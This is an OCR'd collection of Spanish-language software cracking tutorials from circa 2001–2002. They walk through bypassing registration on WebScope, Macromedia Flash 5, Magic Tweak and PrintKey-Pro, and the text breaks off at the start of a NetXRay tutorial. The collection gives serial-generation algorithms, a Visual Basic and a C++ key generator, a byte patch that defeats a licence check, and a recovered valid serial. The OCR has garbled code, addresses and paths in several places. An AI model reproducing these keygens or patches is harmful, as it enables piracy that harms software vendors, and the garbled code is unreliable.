:00541C1E E8B122ECFF call 00403ED4 

:00541C23 C3 ret 


Ahora que ya tenemos nuestro serial salimos de TRW2000 y vamos a iniciar el programa normalmente, nos aparece la 
nagscreen y damos clic en registrar escribimos nuestro nombre y serial y clic en continuar, PRESTO!, ha pasado sin 
dar el mensaje de chicomalo, reiniciemos el programa tan solo para cerciorarnos. 


Vaya! Vaya! Lo que me temía, hay algo que no anda bien, hemos recibido el siguiente mensajito... 
¡Código y nombre de usuario no autorizados! blah, blah, blah, etc. 

Hasta dice que soy un caradura... ;0) 

Qué especie de carajo tiene este programa, vamos a investigar en las Reference Strings... 


No encontramos nada, tan solo lo mismo, que ya hemos visto, que podemos hacer, vamos a rastraer desde el principio, 
pero para eso utilizaremos OllyDBG. 


Cargamos el Olly y cargamos el programa en el Olly, vamos al punto de entrada y empezamos a tracear con F8, vemos 
que extrae nuestros datos del registro de Windows, 


HKCUWSofwarelSaroviWebScope 
Usuario 
Registro 


Desde la dirección 0OS8FEC8 nuestro nombre que viene en minúsculas va a ser comparado con otros nombres 
prohibidos como 


asrael, agustin mollo, marcos oliver hengstebek y má4nson 
y el código nuestro con los códigos 


11111111111119716448, XXXXXX31003412796624 
XXXXXX31005924266626, XXXX786123454806591 
(Las X's es la palabra clave) 


Me imagino que cada uno corresponde a los nombres de arriba, pero continuamos y en 0058FF98 se extrae los 
primeros 6 caracteres de nuestro código 199704 y encontramos un nuevo conjunto de caracteres, con los que se 
comparan los nuestros en 0OS8FFAD, como no son iguales nos da el mensaje de ChicoMalo. 


Bueno cargamos el regedit y buscamos en él y vamos a cambiar 197704 por el conjunto de caracteres buenos. 


Tambien recordemos que en 00541B1C se realizó un calculo para nuestro serial fuera aceptado por el programa, 
debemos de calcularlo de nuevo, pues hemos cambiado los primeros seis caracteres, sino siempre recibiremos el 
mensaje de error 


RECAPITULANDO 


1. Palabra clave (6 Caracteres) 

2. Serial de catorce caracteres (no se que pasa si tiene 13) 

3. Calcular para el nombre (Decimal de Letra por letra) + 1 

4. Unir los primeros 12 caracteres + el calculo del punto 3 

5. Calcular para el serial (Decimal de cada caracter por caracter) + 1 
6. Unir el punto 4 con el punto 5 para el serial correcto 


Al final debe ser así XXXXXX??????AAAANNNN <= El tamaño puede variar (19 o 20) 


AAAA = Primer resultado 
NNNN = Segundo resultado 


LA RUTINA DE GENERACION DEL SERIAL 


Private Sub Genera() 

MyCode = "PalabraClave" 

For I=1 To 6 
A = GetRandomNumber(1l, 6) 
B=B + Trim(Str(A)) 

Next 

MyCode = MyCode + B 

For I= 1 To Len(Trim(Textl .Text)) 
EAX = Asc(Mid(Textl.Text, IL, 1)) 
EBX = EBX + EAX 


Next 
ECX = MyCode + Trim(Str(EBX + 1)) 
EBX= 1 


For I= 1 To Len(Trim(ECX)) 
EAX = Asc(Mid(ECX, L 1)) 


EBX = EBX + EAX 
Next 
Text2.Text = ECX + Trim(Str(EBX + 5698)) 
End Sub 


Public Function GetRandomNumber(Lower As Integer, Upper As Integer) As Integer 
Randomize 
GetRandomNumber = Int((Upper - Lower + 1) * Rnd + Lower) 

End Function 


d WebScope v3.8a 0 xj 
Nombre: [ByTESCRK 


Código: |????7772419776486594 


Generar | 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera 
educacional y tambien como diversión, si ha USTED, le gusta el producto por favor COMPRELO, algunas 
veces... los autores merecen su dinero ;0)" 


Saludos a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK QGiespana.es 


ByTESCRK 


Nota: Sería bueno que me dijeras en qué momento salí del programa con mensaje de error. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 
Programa" Macromedia Flash V 5.0 


PROTECCIÓN: Nag Screen y... 
Descripción: [Programa para presentaciones en Flash, ... 
Dificultad: Facililla (Depende de tu nivel) 


DOWNLOAD: Morpheus o Kaaza 


File Inspector, Hex Workshop, Offset Calculator v 
1.0, Softice, W32dsm89 


CRACKER: WSEXM 


Herramientas: 


| FECHA: 17/11/2001 


INTRODUCCION 


Considero este programa como el mejor dentro de su gama y de aquellos 
rogramas que realizan algo parecido: Presentaciones en Flash (con sonido y muchas 
chorradas de esas). 

¿Por qué he elegido este soft? Pues, por que intentaba aprender la protección de 
anteriores versiones, para un programa que tengo que no hay por donde meterle 
mano, y creía que ésta la tendría también. Me equivoqué. 

El presente tutorial trata de mostrar la verdadera casualidad, no causalidad, que 
desde mi parte, es el mundo del crack. Considero que hasta que no haya una forma 
casi universal de realizar nuestra tarea no podremos denominar a la Crackeología 
como ciencia. Pero soy el menos indicado para hablar de este tema. 

Para quien empiece, lea los tutoriales que se recogen en la página de Karpoff. 
Para quien sepa más que yo, Todos, propongan otras formas de patear esta mierda. 

Antes de empezar decir que tu debes ir antes que yo, me explico, tu debes darle al 
coco para que puedas trazar las posibles ideas que se presentan a lo largo del tutorial 
o aquellas que creas y no se presenten. 


| AL ATAKE 
Loadina. is 0 


Tras realizar los pasos previos, por si no has caído debes 
instalar el programa y ejecutarlo. Aparece una pantallita con 
cinco huecos, uno para cada epígrafe: First/ Initial/ Last 
Name; Organization; Serial Number. Rellena estos recuadros 
como quieras, verás que te aparece un mensaje: “Required 


rr 


Information...”, y no podemos hacer nnaa!! 


Primera posibilidad: 

Pasarle el Filelnspector y observamos que no está 
comprimido con Aspack, Armadillo, etc; 

Nos adentramos en las profundidades de las tumbas con el 
W32dsm89, para comprobar la alerta anterior, te acuerdas, ¿no? 
La hubieras apuntado. En caso afirmativo, veo que estás 
atento. Pulsamos el “string data references”: ¡qué montón! 
Paciencia y sigue buscando: String Resource ID=006309: 
"Required Information. This Macromedia product Cannot run 
wit”, Crees que es ésta. Prueba para ver si te sirve algo. 
Aunque me fijé, me parecía que no podía obtener gran cosa. Fin 
de la primera parte: tocado. 


Segunda Posibilidad: 

Tienes el Softice preparado, ¡ataca! Si se pone el 
infalible hmemcpy se realiza una rutina un poco más larga. 
Perdona si este paso lo has hecho y ¿cuál debes colocar para 
que salga más cortito?, Jejeje. Enhorabuena, has conseguido 
ver que se activaba el Getwindowtexta Por eso, vamos a poner 
éste como nuestro break. No te voy a poner gifs donde 
aparecemos ni donde acabamos por que Karpoff aconseja a sus 
pupilos ahorrar en gilipolleces. Tampoco debes preocuparte por 
eso pues estos pasos los vas a realizar solo o sola para 
comprobar ciertas cosas: 

1* Debes encontrar, una vez dentro del código (cuando te 
aparece el nombre del programa en una línea verde) el número 
de serie falso: FLW500-xxXXXXXXXX 
2% Además, debe aparecer por ahí cerca los datos que has 
introducido en los otros huecos: d eax, d esi... (para ello 
puedes tracear con f10 o darle f12) 
3? Ten paciencia y no te pierdas con el Softice, pues vamos 
por el buen camino. Si se te ha olvidado algo hazlo, como 
quitar el break en ejecución, BC*. 

He de reconocer que me perdí, porque veía el número de 
serie falso y buscaba el verdadero en la ventana de datos, 


pero cuando parecía estar cerca, me echaba a la Calle, algunas 
veces volvía a entrar automáticamente o pulsaba aceptar y 
estamos dentro del depurador Esto me mosqueaba, no sabía 
porque me echaba. Si no te echa o tarda mucho, lo más seguro, 
será que tiene todavía puesto el bpx getwindowtexta y hace 
como el Repeat (de un reproductor CD)que vuelve la canción al 
principio, llevarnos al principio de esta rutina. 

Busca el número de serie que no lo encontrarás, por lo 
menos de esta forma no. Pero sigue traceando hasta que te eche 
del todo fijándote bien en las direcciones y en lo que te 
pueda interesar a la vez que entiendes el código: tocado y 
Run. 


Tercera Posibilidad: 

Esta enlaza con el final de la anterior. Si has realizado 
lo que he dicho, aparte de marearte y de pasar el tiempo, 
habrás conseguido dos cosas: La Puerta de Entrada y la forma 
de cómo atacarla. Llegué por casualidad, más bien porque era 
la última pantalla antes de echarte (sitúate aquí)), pero me 
llamó la atención la forma en la que aparecía, daba buen 
rollo. Si has leído otros buenos tutoriales (todos son buenos) 
considera lo allí aprendido para aplicarlo en este. ¿No has 
visto esto antes, algo así como Mov, Call, Test, Jnz? Verdad, 
así realiza los cambios oportunos de manera temporal en el 
softice. (¿Qué cambios? No me sigues; lee otros manuales donde 
aparezca esta rutina). Lo que no he visto, y he leído 
tutoriales desde 2000, ¿qué es esto que intentamos?: abrir la 
puerta cuando se cierra todo (si alguien me puede explicar el 
por qué de esto, mandadme un e-mail). 

Realizado los cambios de manera temporal, salimos del 
softice (Ctrl-d), sorpresa: estamos dentro. 

A la tercera va la vencida. Realicemos los cambios 
permanentes a través de nuestro editor hexa: lo abrimos y 
buscamos la dirección en hexadecimal, pero cuál era ¿???; 
manda gúevos, debemos calcularla a través del Offset 
Calculator v1.0 metiendo nuestro address donde creamos que 
está la chispa. El programa tiene un funcionamiento sencillo: 
un “File”, donde abres el programa; un hueco cerca donde 
ponemos la dirección en la que hacemos los Cambios. Ves un 
botón Calculate, pues dale si has metido la dirección, y coge 
la dirección en hexadecimal sin la h (final). Si te da error 
es porque tienes abierto este programa con el Hexa, por tanto 
evita tener un mismo programa abierto con dos herramientas a 
la vez. Volvemos al Editor hexa, abrimos el programa vamos a 
Go to (Edit) y colocamos el número comentado del Offset. 
Aparecemos delante de un número que pasaremos a cambiar (75 a 


74) y guardamos estos cambios. Volvemos a abrir el Flash 5.0 
Y... Mierda, no ha pasado nada. La pantallita de registro otra 
vez. Que hemos hecho mal. Respira hondo y Zen cracking. 
Volvemos al Editor Hexa y comprobamos el cambio (introducimos 
el número hexa,...) no ha pasado nada sigue el mismo número 
original. Probamos varias veces a realizar los cambios y... 
Nada, está jodido. Pero el Zen ha dado su fruto ya que hay una 
voz interior que dice “guarda el exe con otro nombre.exe tras 
realizar los cambios”. Así haces (si has guardado el archivo, 
en el primer cambio, con otro nombre, eres cojonudo). Abrimos 
el programa que guardamos con el nombre cambiado y... Otra vez 
la puta pantalla, pero ¿qué ha pasado?: al darle a Cancel 
entramos en el programa totalmente funcional. 

Pensamos: al abrir el programa sale una pantalla,..., es 
una Nags Screen. Adelante quitémosla. No voy a explicar algo 
que puedas leer de otra persona. Así que lee algún tutorial 
del Profesor X en el que venga como eliminar las nags (uséase 
AstroWorld 2000 v 4.1.0.1 (Spanish Edition)). Después de 
eliminar la nags deberás guardarlo otra vez con otro nombre. 
NO SE POR QUÉ. 

Si intentas quitar la Nags Screen en primer lugar vas a 
encontrarte con que el programa parecerá un flash (de estos de 


súper disco fashion). 
| 


| 
Podemos decir realizadas todas las tareas y ratón en mano: Tu 
she 


Si busca el número en Internet y lo instalas verás que no 
hay cambios, exceptuando que se registra formalmente. Pero si 
has leído hasta aquí y decides hacer eso, de forma permanente 
eres un... Ten en Cuenta que si introduces el número de serie 
correcto, no podrás acceder al que tu has guardado. Así decir 
también que existen alguna pequeña diferencia entre la 
configuración real (tras introducir el número correcto) y 
entrar por la puerta trasera, pero que debes subsanar leyendo 
tutoriales para aprender a utilizar Macromedia Flash. Si 
quieres ver tus datos en el registro dirígete a 
HKEY_LOCAL_MACHINEXSOFTWAREXMACROMEDIAXFLASHI5NREGISTRATION 


| 
| 


Conclusión 

Hemos crackado un programa por casualidad, o al menos eso 
creo en la primera parte. Si has realizado los cambios antes 
que yo de forma satisfactoria, enhorabuena. Si te has perdido 
léelo despacio o mándame un e-mail realizando una crítica, 
diciéndome otra forma (serial verdadero), o lo que quieras. 
wsexmémixmail.com 


Gracias 

A estas páginas de donde aprendemos, a esa gente que sabe 
más y a esa otra que sabe no menos, para que se siga 
aumentando los conocimientos y aprendamos de todos con todos y 
de todas las formas. Gracias. 


El autfr no es responsable del mal uso que se pueda 


realizar de este texto. Solo la finalidad educativa está 
permitida y admitida sin saltarse las leyes de tu gobierno. 
Cómpralo si vas a trabajar con él o si lo utilizas, darás de 
comer a una persona. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgación de información en 
Castellano, sobre Ingeniería Inversa y Programación. Email "Colabora con tus 


Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: Magic Tweak vl1.60 

PROTECCION: Name / Serial 

Objetivo: Obtener un serial válido 

Descripcion: MagicTweak hace fácil el configurar millones de cosas en Windows y no necesita hacer 
modificaciones al registro manualmente. 

Dificultad: Media 

DOWNLOAD : http: //www.magictweak.com 

Herramientas: TRW2000, W32dasm 

CRACKER: ByTESCRK FECHA: 13/12/2001 


INTRODUCCION 


Bueno, después de algunos días que me he hecho un tanto el desentendido en esto he regresado a 
crackear este programa y la verdad es que he estado viendo algunos otros de los cuales ya haré un 
tuto, mientras que aquí les cocino este otro. 


Este programa es muy práctico, puede sacarlo a uno de apuros realmente, más sin embargo, cómo 
siempre lo he dicho las protecciones algunas veces no son apropiadas para ciertos programas, la 
verdad es que me parece un tanto inconcebible el precio de esta utilería que aparte de ocupar 
espacio en tu disco no es más ni menos una utilería, que bien, pasemos ahora a lo nuestro... 


AL ATAKE 


Cómo siempre cargamos el programa y nos vamos al punto de registrar que tiene y vemos que en la pantalla 
de About nos aparece un botón Enter Code lo presionamos y luego nos aparece una ventanita con el espacio 
para ingresar nuestro nombre y serial, al ingresarlos nos dice 


"Thanks for your registering.Please restart the program to verify the registration code." 


Clásico truco en algunos programas hoy en día, vamos a desensamblar en W32DASM y buscamos la cadena, 
cuando la hallemos haremos doble clic sobre ella y caeremos por esta parte de código 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00423DE3(C) <= Rondamos por aqui... 


| 
:00423DFD 8B86F4050000 mov eax, dword ptr [esi+000005F4] 
:00423E03 57 push edi 


* Reference To: USER32.wsprintfA, Ord: 02ACh 


| 

:00423E04 8B3D30864600 mov edi, dword ptr [00468630] 
:00423E0A 8D4C2408 lea ecx, dword ptr [esp+08] 
:00423E0E 50 push eax 

:00423E0F 51 push ecx 

:00423E10 FFD7 call edi 

:00423E12 8B96F0050000 mov edx, dword ptr [esi+-000005FO] 
:00423E18 8D442438 lea eax, dword ptr [esp+38] 
:00423E1C 52 push edx 

:00423E1D 50 push eax 

:00423E1E FFD7 call edi 

:00423E20 83C410 add esp, 00000010 

:00423E23 8BCE mov ecx, esi 

:00423E25 6A40 push 00000040 


* Possible StringData Ref from Data Obj ->"Register" 
| 
:00423E27 68EC134800 push 004813EC 


* Possible StringData Ref from Data Obj ->"Thanks for your registering.Please " 
->"restart the program to verify " 
->"the registration code." 


| 

:00423E2C 689C1F4800 push 00481F9C <= Caemos aqui 
:00423E31 E8F5270200 call 0044662B 

:00423E36 8B8EF4050000 mov ecx, dword ptr [esi+000005F4] 

* Reference To: KERNEL32.WritePrivateProfileStringA, Ord: 02E5h 


| 
:00423E3C 8B3D60824600 mov edi, dword ptr [00468260] 


* Possible StringData Ref from Data Obj ->"Mgreg.ini" <= Aqui se guarda el serial 


| 
:00423E42 680CF14700 push 0047F10C 
:00423E47 51 push ecx 


Al ir a la dirección 00423DE3 encontramos este código (NOTA: punto de ruptura en 00423DD9), vamos a 
ir a ver que hay en 00433227 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00423DB3(C) 


| 

:00423DCD 8B86F0050000 mov eax, dword ptr [esi+000005F0] 
:00423DD3 68E04D4800 push 00484DE0 

:00423DD8 50 push eax 

:00423DD9 E849F40000 call 00433227 <= Se genera el serial... 
:00423DDE 83C408 add esp, 00000008 

:00423DE1 85CO0 test eax, eax 

:00423DE3 7518 ¡ne 00423DFD <= Aqui da el Thank you... 
:00423DE5 6A10 push 00000010 


Bueno hemos llegado aquí y EAX trae el serial y EDX el nombre 


:00433227 55 push ebp 
:00433228 8BEC mov ebp, esp 


:0043322A 833DFC84480000 cmp dword ptr [004884FC], 00000000 
:00433231 53 push ebx 

:00433232 56 push esi 

:00433233 57 push edi 

:00433234 7512 jne 00433248 

:00433236 FF750C push [ebp+0C] 

:00433239 FF7508 push [ebp+08] 

:0043323C E8AF400000 call 004372F0 <= Aqui entramos 
:00433241 59 pop ecx 

:00433242 59 pop ecx 

:00433243 E989000000 ¡mp 004332D1 <= A este salto volveremos 


Hemos ido al salto 


:004372F0 8B542404 mov edx, dword ptr [esp+04] <= EDX recibe el serial 
:004372F4 8B4C2408 mov ecx, dword ptr [esp+08] <= ECX recibe un valor 0 
:004372F8 F7C203000000 test edx, 00000003 

:004372FE 753€ ¡ne 0043733C 


:00437300 8B02 mov eax, dword ptr [edx] <= Extrae el primer caracter del serial 
:00437302 3A01 cmp al, byte ptr [ecx] <= Compara el valor de EAX con el de ECX 
:00437304 752E ¡ne 00437334 <= Como no son iguales vamos a 00437334 
:00437306 OACO or al, al 

:00437308 7426 je 00437330 


Ya hemos ido y... 


:00437334 1BC0 sbb eax, eax <= Aqui caemos... 
:00437336 D1EO shl eax, 1 

:00437338 40 inc eax 

:00437339 C3 ret <= Regresamos 


Hemos vuelto a la rutina anterior 


:00433239 FF7508 push [ebp+08] 

:0043323C E8AF400000 call 004372F0 <= Aqui entramos 
:00433241 59 pop ecx <= Aqui regresamos 

:00433242 59 pop ecx 

:00433243 E989000000 j¡mp 004332D1 <= Vamos a este salto 


Luego de entrar en el salto hayamos esto... 


:004332D1 5F pop edi <= A aqui saltamos... 

:004332D2 5E pop esi 

:004332D3 5B pop ebx 

:004332D4 5D pop ebp 

:004332D5 C3 ret <= Regresamos y nos da el Thanks for your... 


Esto no está haciendo nada bueno... nos vamos a ver en toda la entrada al programa, cargamos el programa 
nuevamente y empezamos a tracear desde el OEP y vemos que el programa llega hasta aqui (si tienes duda 
en esto consulta mi tuto sobre WebScope v3.8a) 


:00433CCE 56 push esi 

:00433CCF 56 push esi 

:00433CD0 FF1568834600 Call dword ptr [00468368] => KERNEL32.GetModuleHandleA 
:00433CD6 50 push eax 

:00433CD7 E86BDB0000 call 00441847 <= Entramos aquí... 


Nos encontramos con esto otro... 


:00441847 FF742410 push [esp+10] 

:0044184B FF742410 push [esp+10] 

:0044184F FF742410 push [esp+10] 

:00441853 FF742410 push [esp+10] 

:00441857 E8FOAO00O0O call 0044B94C <= Entramos... 
:0044185C C21000 ret 0010 


Vemos un montón de código, con llamadas y saltos, pero hasta en 0041C76C encontramos algo 
interesante y no es sino hasta entre 0041D136 hasta 0041D179 en donde se genera el serial correcto... 
entonces cuando lleguemos al punto siguiente es que... 


:0041D177 40 inc eax 

:0041D178 49 dec ecx 

:0041D179 75BB jne 0041D136 

:0041D17B 8BB42494000000 mov esi, dword ptr [esp+00000094] <= Obtendremos nuestro serial 
válido... 


Ahora ya tenemos el serial correcto y vamos a ingresarlo, y podremos usar el programa de manera más libre, 
aunque sin embargo quiero que recuerdes, lo de siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (gracias por tus consejos y ayuda en la 
realización de este tuto) y a todos los crackers hispanohablantes. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: PrintKey-Pro v1.02 


PROTECCION: Obtener el Serial y realizar el Keygen. 

Descripcion: Aplicación para Capturar pantallas. 

Dificultad: Novato, Facililla, Media, Difícil, ETC 

DOWNLOAD: http://www.warecentral.com 

Herramientas: File Inspector, DeDe 3.0, W32dasm, SoftICE. 

CRACKER: Saccopharynx FECHA: 21/11/2001 


INTRODUCCION 


Bueno: Hola a todos. Cómo están? Aquí les presento mi segundo tutorial. 
En realidad es el segundo que envío, pero tengo hechos algunos más, pero 
todavía no los he pasado a página web. A medida que lo haga los ire 
enviando. Aprovecho el tutorial para agradecer a Dek_Oin por responder a 
mis pedidos de ayuda. Marchando... 


AL ATAKE 


INTRO 


Debido a que para realizar mis tutoriales necesito una herramienta para capturar 
imagenes he bajado de internet PrintKey-Pro v1.02, la cual antes de ser mi 
herramienta de trabajo fue mi víctima, ya que es una versión trial de 30 días. 
Las imágenes de este tutorial fueron capturadas con él, incluso la de él mismo, 
Jajaja... 


PRESENTANDO A LA VICTIMA 


Como mencioné anteriormente este es un programita para Capturar pantallas, 
simple, amigable y que tiene varias opciones. Las pantallas se pueden guardar en 
varios formatos. Acompaña a este tutorial el Keygen del serial de la víctima, 
hecho en C++ (aun no tengo tiempo para aprender Win32_ASM, no tengo Delphi ni 
Visual C, y ni sueñen que haga un Keygen en Vifual Bafic; después de haber 
trabajado con él realmente lo detesto, porque todo muy lindo para el usuario del 
sistema hecho en VB, pero para los programadores... un dolor de huevo). 


MANOS A LA OBRA 


Una vez instalada la victima ejecutamos la misma, vamos a Help->Register y 


cargamos los datos: 


Name: SACCOPHARYNX 
Key: 1234567 


Damos click sobre el botón Register y veremos un mensaje como este: 


Invalid key Please reenter ! 


Como no nos registramos ejecutamos File Inspector, abrimos el archivo 
PrintKeyPro.exe, analizamos el mismo, vamos a la solapa Compilador y vemos que 
fue hecho en Borland Delphi 3.0. Hmmm!!! Mi poca experiencia me dice que W32Dasm 
no nos servirá en un principio, ya que tiene problemas con las String 
References. La mejor opción es usar DeDe. La versión de DeDe 2.5 no funcionó con 
este programita, a si que busqué en www.balbaro.com y bajé la versión 3.0, con 
la cual descompilé a la víctima sin problemas. 


Podemos debuggear directamente con SoftICE, pero para no estar debuggeando a lo 
loco cada instrucción a partir del breakpoint en hmemcpy, nos conviene ir 
cercando al código de la víctima usando DeDe seguido de W32Dasm. Ahora 
ejecutamos DeDe 3.0, cargamos la víctima (PrintKeyPro.exe) y damos click en el 
botón Process. Una vez descompilada, vamos a la solapa Procedures. Si nos 
fijamos en la columna de Unit Name, nos interesa "Unit12 TRegisterForml" ya que 
es el Form de registro. 


7 DeDe v3.0b [c] 1999-2001 by DaFixer 


C:Márchivos de programa'Printkey-Pro*Printk 


lOPreviews TilOPreviews 
Previews TiPreviews 
Unit TTrayForml 
Unit10 ThMailForml 
Unit11 TRectForml 
TRegisterForml 
TFullRectFormi 
TáboutForml 
TObjectForml 
TMainForml 
TEditForml 


BitBtn2Click 
BitBtrvl Click 
FormCreate 
BitBtn2Click 
PROC”OD4F38DA 
PROC-OD4F3EDC 
“PROC-OD4F38E4 
a “PROC-ODAF3854 
: PROC-0D4F2B50 
TPiniFomi PROC-O04F3BE7 
TTextForml , . 
Lletconl PROC-OD4F3BED 
3d “PRAPAMAFIRER 


En la ventana de la derecha hacemos click con el botón derecho del mouse sobre 
BitBtn1Click, elejimos la opción Show additional data y veremos que se trata del 
botón de Registro: 


Entonces nuevamente, click con el botón derecho del mouse sobre BitBtnl1Click, 
pero ahora elejimos Disassemble. Se nos abrirá un ventana con el código que se 
ejecuta al hacer click sobre el botón Register. Lo que nos interesa saber es la 
línea en donde se hace referencia al String Reference Invalid key Please reenter 
l. Por lo tanto en la ventana que se nos abrió vamos a Edit->Find Text y 
buscamos la palabra Key para llegar hasta aquí: 


004F372E ESEDSCF1FF call DO040C420 


| 
DO4F3733 B208394F00 mov eax, $004F3908 


Como se puede observar se hace referencia a este string en la posición 004F3733. 
Dato muy importante, porque ahora analizaremos el código de la víctima más 
detalladamente a partir de esta posición, pero con W32Dasm. 


Ejecutamos W32Dasm, cargamos la víctima y vamos hasta dicha posición 
(Shift+F12). Si observamos detenidamente el siguiente código existen dos 
posibilidades de llegar hasta el mensaje de error: 


1) El salto condicional de la posición 004F36F3. Este salto se realiza si en el 
call de la posición 004F36EA se detecta que el serial no contiene caracteres 
numéricos. Para comprobar esto poner un breakpoint en 004F36EA y entrar con F8. 


2) Que el serial contenga solo caracteres numéricos, pero no sea el correcto. En 
este Caso no se ejecutará el salto de la posición 004F372C, dejándonos llegar 
justo al mensaje de error. El salto de esta posición solo se ejecuta si el 
resultado de la comparación anterior: 


:004F372A 3BFO cmp esi, eax 


es verdadero. Por lo tanto en esi o eax está el serial correcto. No voy a 
explicar como debuggear en SoftICE; existen muchos tutoriales, al respecto. Lo 
que se debe hacer para comprobar donde está el serial correcto es poner un 
breakpoint. Aquí hay dos posibilidades: 


A) Si no les interesa el Keygen ponen uno en 004F372A (bpx 004F372A). Cuando 
lleguen aquí y estén dentro de SoftICE ejecuten: 


? esi (Verán el serial falso: 1234567) 
? eax (Verán el serial verdadero: 93657585) 


B) Si les interesa el Keygen recomiendo poner un breakpoint en 004F3725, ya que 
aquí está el call que genera el serial. Cuando se detenga la ejecución aquí, 
entrar con F8. 


Ahora que ya tenemos el serial correcto cargamos nuestros datos nuevamente: 


Name: SACCOPHARYNX 
Key: 93657585 


Damos click en Register, cerramos y abrimos nuevamente la víctima, vamos a 
About, y: 


(c)1999-2000 by Warecentral 


Legales: 


GIF is a trademark of CompuServe, an HéR Block company. 
L24w licenced under U.S. patent 4,558,302 and foreign counterparts. 


Ya tenemos registrada a la víctima. A los que les interesa el Keygen los invito 
a la sección que sigue y a los que no también que no viene nada mal aprender 
más. 


KEYGEN 


Para analizar el Keygen supongo que siguieron las intrucciones del paso B. Sino, 
Qué esperan? Una vez que entraron con F8 debido al breakpoint en el call de la 
posición 004F3725, sigan traceando un poco con F10 hasta llegar aquí: 


|En estas pocas líneas está todo el código que genera el serial: 


:005040F2 -—-> Mueve nuestro Name a ecx. 

:005040F5 -> Mueve uno a uno, dependiendo del valor de edx, Cada Caracter 
de nuestro name. 

:005040FA -> Suma el código ASCIT del caracter en curso a ebx. 

:005040FC -> Incrementa edx. 

:005040FD -> Decrmenta eax. 

:005040FE -> Cuando eax valga 0 se han sumado todos los códigos ASCII de 
los caracteres de nuestro Name, menos el último. Si eax no 
es 0 se sigue con el siguiente caracter hasta el penúltimo 
inclusive. Una vez hecha la suma, el resultado de la misma 
se guarda en ebx. 

En el ejemplo de SACCOPHARYNX, esta será: 


ebx = 1179 (Decimal) 
ebx = 49D (Hexa) 


:00504100 -> Al resultado de la suma le agrega: 


12436 (Decimal) 
3094 (Hexa) 


Quedando el resultado en ebx. Para el caso 
de SACCOPHARYNX: 


1179 + 12436 
49B + 3094 


ebx 
ebx 


13615 (Decimal 
352F (Hexa) 


== 


:00504106 -> Se multiplica ebx por: 


6879 (Decimal) 
1ADF (Hexa) 


Almacenado el resultado en eax. Para el caso 
de SACCOPHARYNX: 


eax 
eax 


352F * 1ADF = 59519F1 (Hexa) 
13615 * 6879 = 93657585 (Decimal) 


Este último les parece conocido?; Siiiii, es el serial correcto. KeyGen listo. 
Aquí les dejo el código fuente del Keygen hecho en C++: 


// DESCRIPCION DEL ALGORITMO: 

// El serial solo se compone de caracteres numéricos. 

// Este se genera de la siguiente manera: 

1/ 

// A) Se realiza la suma de cada código ASCII de cada caracter de nuestro Name 
// menos del último. 

// Si Name contiene carcteres en mayúsculas, la suma 

// se realiza con los códigos ASCIIs del caracter correspondiente 

// en miníscula. Name debe contener por lo menos un 

// largo de tres caracteres. 


// 

// B) Al resultado de dicha suma se le agrega 12436. 
// 

// C) Al resultado de B se lo multiplica por 6879. 


tinclude <time.h> 


finclude <stdio.h> 
tinclude <conio.h> 
tinclude <string.h> 
tinclude <stdlib.h> 
ftinclude <iostream.h> 


long GeneraSerial (char *); 


void main (void) 

( 
char name[20]1; 
clrscr(); 
printf ("PrintKey-Pro v1.02 Keygenin"); 
printf ("by SACCOPHARYNX (21/11/2001) .An1n"); 
cout << "Name: "; 
cin >> name; 


if (strlen(name) < 3) 

cout << "Name debe tener al menos 3 caracteres de largo." << "Ann"; 
else 

cout << "Serial: " << GeneraSerial (name) << "Ann"; 


) 


long GeneraSerial (char * name) 


1 


int i; 

int largo = strlen (name); 
long suma_cod_ascii = 0; 
long serial = 0; 


// SUMA LOS CODIGOS ASCII DE LOS CARACTERES DE NAME 
for (i=0; i < largo-1; 1++) 
( 
if (name[il] >= 65 6€g£ name[i] <= 90) 
name[il] += 32; 


suma_cod_ascii += namel[i]; 


) 


// CALCULA EL SERIAL 
serial = (suma_cod_ascii + 12436) * 68709; 
return (serial); 


Para compilarlo yo utilicé Borlandc C++ 3.1. Si alguien lo quiere compilar 
cortar el código entre las líneas punteadas y copiarlo a un archivo, e]. 
pkp.cpp. Luego desde una consola de DOS ejecutar: 


bcc pkp.cpp 
y tendrán el ejecutable. Bueno espero que les haya gustado el tutorial. Me 


despido haste el próximo. Cualquier duda abajo tienen mi dirección de e-mail. 
Saludos a todos. 


Saccopharynx. saccopharynxftyahoo.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: | NetxRay 3.0 (Demo) 


PROTECCION: 


Descripcion: Solo una de las tantas limitaciones 
Dificultad: Medio 


DOWNLOAD : 


Limitación de paquetes capturados a mostrar 


http://www.logixcomms.co.uk 


Herramientas: OllyDbg, spy++ 


CRACKER: Tamoxifeno FECHA: 27/01/2002 


INTRODUCCION | 


Buenas a todos, para que sea un gran debut me reservé una perlita para los que nos gustan las redes...nada 
mejor que disponer de un Sniffer sin limitaciónes para ver los paquetes capturados!!! . Puesto que no he 
podido encontrar quien lo haya hecho ( si alguien sabe donde encontrar el crack completo, que me ahorre el 
trabajo y me avise, gracias!!!), que mejor que hacerlo uno mismo asi que manos a la obra. Aclaro que utilizo 
el Ollydbg pués es increiblemente potente utilizando el entorno de Windows, y con un excelente manejo para: 
patchear el codigo, hacer dumps de toda la memoria utilizada por la aplicación, busquedas y cambios en la 


misma (limitación que encontré en el W32Dasm), analisis Heuristico del codigo, incorporar archivos ".lib" 
